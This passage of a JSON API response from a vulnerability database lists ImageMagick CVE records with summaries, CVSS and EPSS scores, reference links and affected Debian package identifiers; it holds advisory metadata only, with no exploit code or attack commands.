"3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uwq6-h2du-dkdn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49507?format=api", "vulnerability_id": "VCID-v2r8-1wgn-1bgs", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-5341.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-5341.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-5341", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09703", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09562", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09626", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.0961", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09501", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09506", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09656", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09613", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09525", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09599", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09648", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09657", "published_at": "2026-04-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-5341" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241774", "reference_id": "2241774", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-01-02T20:55:18Z/" } ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241774" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/aa673b2e4defc7cad5bec16c4fc8324f71e531f1", "reference_id": "aa673b2e4defc7cad5bec16c4fc8324f71e531f1", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-01-02T20:55:18Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/aa673b2e4defc7cad5bec16c4fc8324f71e531f1" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:6", "reference_id": "cpe:/o:redhat:enterprise_linux:6", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:6" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7", "reference_id": "cpe:/o:redhat:enterprise_linux:7", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7" }, { "reference_url": "https://access.redhat.com/security/cve/CVE-2023-5341", "reference_id": "CVE-2023-5341", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-01-02T20:55:18Z/" } ], "url": "https://access.redhat.com/security/cve/CVE-2023-5341" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/6621-1/", "reference_id": "USN-6621-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6621-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2023-5341" ], "risk_score": 2.8, "exploitability": "0.5", "weighted_severity": "5.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v2r8-1wgn-1bgs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81972?format=api", "vulnerability_id": "VCID-vf3u-cgrx-a7d7", "summary": "ImageMagick: outside the range of representable values of type 'float' at MagickCore/quantize.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27769.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27769.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27769", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24031", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24161", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24198", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.23985", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24053", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24098", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24115", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24073", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24016", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24029", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.23998", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.23871", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27769" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27769", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27769" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894690", "reference_id": "1894690", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894690" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27769" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vf3u-cgrx-a7d7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82596?format=api", "vulnerability_id": "VCID-vgvf-at1z-8ydr", "summary": "ImageMagick: out-of-bounds read in ReadXWDImage in coders/xwd.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-15139.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-15139.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59616", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59731", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.5977", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59776", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.5976", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59689", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59713", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59683", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59734", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59747", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59767", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59751", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00385", "scoring_system": "epss", "scoring_elements": "0.59733", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": 